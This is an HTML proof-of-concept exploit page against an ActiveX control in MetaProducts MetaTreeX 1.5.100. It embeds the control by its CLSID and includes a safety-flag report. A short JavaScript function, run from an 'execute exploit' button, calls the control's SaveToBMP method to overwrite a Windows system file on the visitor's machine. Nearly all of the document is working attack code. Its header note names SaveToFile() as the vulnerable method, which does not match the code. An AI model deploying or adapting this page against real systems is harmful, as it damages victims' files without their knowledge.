<HTML> <BODY>
<b> Author : Houssamix <br/> <br/> <br/>
MetaProducts MetaTreeX V 1.5.100 Remote File Overwrite Exploit <br/>
Note : SaveToFile() is vuln to <br/>
<b/>
<object id=hsmx classid="clsid:{67E66985-F81A-11D6-BC0F-F7B40157DC26}"></object>
<SCRIPT> /*
Report for Clsid: {67E66985-F81A-11D6-BC0F-F7B40157DC26} RegKey Safe for Script: Faux RegKey Safe for Init: Faux Implements IObjectSafety: Vrai IDisp Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data
*/ function hehe() { File = "c:\\windows\\system_.ini" hsmx.SaveToBMP(File) }
</SCRIPT> <input language=JavaScript onclick=hehe() type=button value="execute exploit"><br> </body> </HTML>
|